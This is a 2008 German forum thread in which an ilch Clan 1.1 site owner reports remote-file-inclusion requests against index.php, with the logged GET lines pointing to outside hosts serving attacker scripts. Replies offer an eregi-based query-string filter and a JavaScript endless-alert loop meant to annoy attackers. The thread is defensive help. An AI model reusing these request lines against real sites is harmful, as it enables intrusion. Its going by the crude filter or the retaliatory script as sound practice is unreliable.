ilch Forum » Ilch Clan 1.1 » Allgemein » Aufruf von Drittseiten über ILCH Files

Geschlossen
  1. Mo. 16.06.2008 13:41 Uhr #1
    User Pic
    d-fiant Mitglied
    Registriert seit
    23.03.2007
    Beiträge
    55
    Beitragswertungen
    0 Beitragspunkte
    In der vergangenen Woche wuden an 2 Tagen über 60 GIG Traffic durch die nachstehenden Aufrufe generiert.

    GET /index.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1
    GET /?news-p4/index.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1
    GET /index.php?admin=http://www.cdpm3.com/id.txt? HTTP/1.1
    GET index.php?gallery-show-0-p9=http%3A%2F%2Fmojazubarka.sk%2Ftest%2Fadmin%2Fsicaqe%2Fjufoxir%2F&diashow=start HTTP1.0

    Wie kann ich diese Aufrufe am geschicktesten sofort abstellen?

    Danke.


    Zuletzt modifiziert von d-fiant am 16.06.2008 - 15:43:05
    0 Mitglieder finden den Beitrag gut.
  2. Mo. 16.06.2008 15:42 Uhr #2
    User Pic
    d-fiant Mitglied
    Registriert seit
    23.03.2007
    Beiträge
    55
    Beitragswertungen
    0 Beitragspunkte
    Ist das Problem klar? Der index.php wird ein Aufruf mitgegeben der != einer der .php im Ordner /include/includes ist und die Adresse wird trotzdem geholt.

    Je nachdem wie gross das geholte File ist ermöglicht das enormen Missbrauch.

    Ich möchte das so schnell wie möglich verhindern und brauche einen Tipp.
    0 Mitglieder finden den Beitrag gut.
  3. Mo. 16.06.2008 19:24 Uhr #3
    User Pic
    Panicsheep Hall Of Fame
    Registriert seit
    24.08.2004
    Beiträge
    10.192
    Beitragswertungen
    16 Beitragspunkte
    Welche Scriptversion benutzt du?
    Und welche PHP Einstellungen (siehe Adminbereich --> Serverkonfiguration) hat dein Server
    Das werden dich die, die Ahnung haben, hier bestimmt als nächstes fragen.
    Omnia bona erunt
    0 Mitglieder finden den Beitrag gut.
  4. Mo. 16.06.2008 19:32 Uhr #4
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Also bei 1.1 kann man da sonstwas für Parameter mitgeben, falls da nicht noch anderweitig Dateien auf deinem Server verändert worden, kann so eigentlich gar nix besonderes geschehen, die Seite wird einfach normal aufgerufen.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  5. Mo. 16.06.2008 23:47 Uhr #5
    User Pic
    d-fiant Mitglied
    Registriert seit
    23.03.2007
    Beiträge
    55
    Beitragswertungen
    0 Beitragspunkte
    Naja, Tatsache ist, bei mir funktioniert das. Wenn eine beliebige Webadresse gemeinsam mit der index.php von ilch aufgerufen wird wird die Verbindung hergestellt und Traffic generiert. Ich hab keine Ahnung wie ich das stoppen kann..

    Wird langsam ein teurer Spass. schon fast 100GB Übertraffic.. traurig
    0 Mitglieder finden den Beitrag gut.
  6. Di. 17.06.2008 00:12 Uhr #6
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Inwiefern soll denn da Traffic generiert werden?
    Wenn jemand diese Adresse extrem oft aufruft entsteht auch Traffic, aber ansonsten wüsste ich nicht, wie so sonst Traffic enstehen soll.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  7. Di. 17.06.2008 06:32 Uhr #7
    User Pic
    boehserdavid Mitglied
    Registriert seit
    26.08.2006
    Beiträge
    2.122
    Beitragswertungen
    2 Beitragspunkte
    Hey, d-fiant!

    Das Prob mit diesen Typen hatte ich auch, bis...

    index.php 
    <?php
.....
if(!eregi("http", $_SERVER['QUERY_STRING'] ) ) {
require_once ('include/contents/'.$menu->get_url());
}
...
?>


    Wer jetzt Seiten mit HTTP nach index.php aufruft, bekommt eine leere Seite angezeigt... Besser wäre natürlich die Lösung über eine Umleitung zu einen endlosen Alert, damit das auch Wirkung hat.

    Mit böhsen Grüßen
    BöhserDavid
    -Heute schon böhse gewesen?- Ab zur Community
    -No Support via Contact-
    0 Mitglieder finden den Beitrag gut.
  8. Di. 17.06.2008 08:48 Uhr #8
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Sinnvoller wäre es dann ja eigentlich gleich ganz oben 
    if(eregi("http", $_SERVER['QUERY_STRING'] ) ) die('no hacks');
    einzufügen, damit gar nicht erst was gemacht wird.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  9. Di. 17.06.2008 09:09 Uhr #9
    User Pic
    boehserdavid Mitglied
    Registriert seit
    26.08.2006
    Beiträge
    2.122
    Beitragswertungen
    2 Beitragspunkte
    Nagut, so geht das auch, ich hab das bei mir nur etwas komplexer, und auch vor der DB-Connection und allem,. aber von so einer keinen Meldung lassen die "..." sich leider nicht abschrecken, deswegen der Tipp mit der Umleitung zu einen endlos alert LIKE: 

    <script type="text/javascript" language="JavaScript">
<!--
function abc(){
alert("Testtext");
abc();
}
window.setTimeout(abc, 50);
//-->
</script>


    ^^

    Das einzige Mittel dagegen wäre dann nur JS ausmachen.
    -Heute schon böhse gewesen?- Ab zur Community
    -No Support via Contact-
    0 Mitglieder finden den Beitrag gut.
  10. Di. 17.06.2008 12:51 Uhr #10
    User Pic
    d-fiant Mitglied
    Registriert seit
    23.03.2007
    Beiträge
    55
    Beitragswertungen
    0 Beitragspunkte
    Ihr seid super, hat gewirkt und Traffic geht spürbar runter. Woran es auch immer im Detail lag, es ist abgestellt! lächeln
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Allgemein

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten